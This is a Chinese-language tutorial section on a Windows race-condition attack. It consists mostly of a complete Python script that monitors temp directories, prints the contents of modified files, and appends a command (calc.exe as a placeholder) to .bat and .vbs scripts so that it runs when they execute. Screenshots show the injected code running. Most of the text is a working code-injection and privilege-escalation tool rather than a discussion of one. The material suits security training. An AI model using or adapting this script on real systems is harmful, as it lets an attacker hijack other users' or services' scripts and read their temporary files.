## 条件竞争-代码插入

现在我们已经可以监控进程和文件位置了，下面让我们来看看是否能够自动化地插入代码到目标文件中。我所见过的最常被使用的通用脚本语言是VBScript、批处理和PowerShell。

#### 代码实现

 

```python
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# @Time     : 2020/12/16 16:14 
# @Author   : ordar
# @File     : file_monitor.py
# @Project  : dll_injection2.py
# @Python   : 3.7.5
import tempfile
import threading
import win32file
import win32con
import os


# 1. 典型的临时文件所在目录
dirs_to_monitor = ['c:\\WINDOWS\\Temp', tempfile.gettempdir()]
print(dirs_to_monitor)

# 文件修改行为对应常量
FILE_CREATED = 1
FILE_DELETED = 2
FILE_MODIFIED = 3
FILE_RENAMED_FROM = 4
FILE_RENAMED_TO = 5

command = 'calc.exe'
file_types = {}
file_types['.bat'] = '\n%s\n' % command
file_types['.vbs'] = '\nwscript.createobject("wscript.shell").run("%s")\n' % command

def inject_code(full_filename, extension, contents):

    # 判断文件内容是否已经插入过了代码，如果插入过代码了就不在插入了
    if file_types[extension] in contents:
        return True
    # 如果没有插入代码，那么插入代码
    contents += file_types[extension]
    try:
        with open(full_filename, 'w') as f:
            f.write(contents)
        print('[+] Inject code success')
    except:
        print('[-] Inject code failed')
    return True


def start_monitor(path_to_watch):
    # 开启文件监控
    FILE_LIST_DIRECTORY = 0x0001

    # 2. 获取需要监控的文件目录的句柄
    h_directory = win32file.CreateFile(path_to_watch, FILE_LIST_DIRECTORY,
                                       win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
                                       None, win32con.OPEN_EXISTING, win32con.FILE_FLAG_BACKUP_SEMANTICS, None)
    while True:
        try:
            # 3. 监控目录改变
            results = win32file.ReadDirectoryChangesW(h_directory, 1024, True,
                                                      win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
                                                      win32con.FILE_NOTIFY_CHANGE_DIR_NAME |
                                                      win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
                                                      win32con.FILE_NOTIFY_CHANGE_SIZE |
                                                      win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
                                                      win32con.FILE_NOTIFY_CHANGE_SECURITY,
                                                      None, None)
            # 4. 枚举改变类型
            for action, file_name in results:
                full_filename = os.path.join(path_to_watch, file_name)
                if action == FILE_CREATED:
                    print('[+] Created %s' % full_filename)
                elif action == FILE_DELETED:
                    print('[-] Deleted %s' % full_filename)
                elif action == FILE_MODIFIED:
                    print('[*] Modified %s' % full_filename)
                    # 输出文件内容
                    print("[*] Dumping contents:")
                    # 5. 尝试读取文件内容
                    try:
                        with open(full_filename, 'r') as f:
                            content = f.read()
                            print(content)
                        print("[*] Dump Success")
                    except:
                        print('[-] Dump Filed')
                    # 修改文件时，插入代码
                    filename, extension = os.path.splitext(full_filename)
                    if extension in file_types.keys():
                        inject_code(full_filename, extension, content)

                elif action == FILE_RENAMED_FROM:
                    print('[>] Renamed from %s' % full_filename)
                elif action == FILE_RENAMED_TO:
                    print('[<] Renamed to %s' % full_filename)
                else:
                    print('[-] Unknown: %s' % full_filename)
        except:
            pass


# 为每个监控器创建一个线程
for path in dirs_to_monitor:
    monitor_thread = threading.Thread(target=start_monitor, args=(path,))
    monitor_thread.start()
    print("[+] File monitor thread for path : %s" % path)

```

#### 运行结果

打开一个cmd，执行python file_monitor_inject_code.py

 

打开另一个cmd，然后切换到temp目录，写入“hello world”到test_inject_code.bat文件

![img](img/b129d7de-48b7-11eb-9897-8cc6814bc10b.png)

可以看到我们的程序成功插入代码到bat文件

![img](img/c08ffc24-48b7-11eb-a829-8cc6814bc10b.png)

我们执行bat文件，我们注入的代码也会跟着执行。

![img](img/d11cec8c-48b7-11eb-94fa-8cc6814bc10b.png)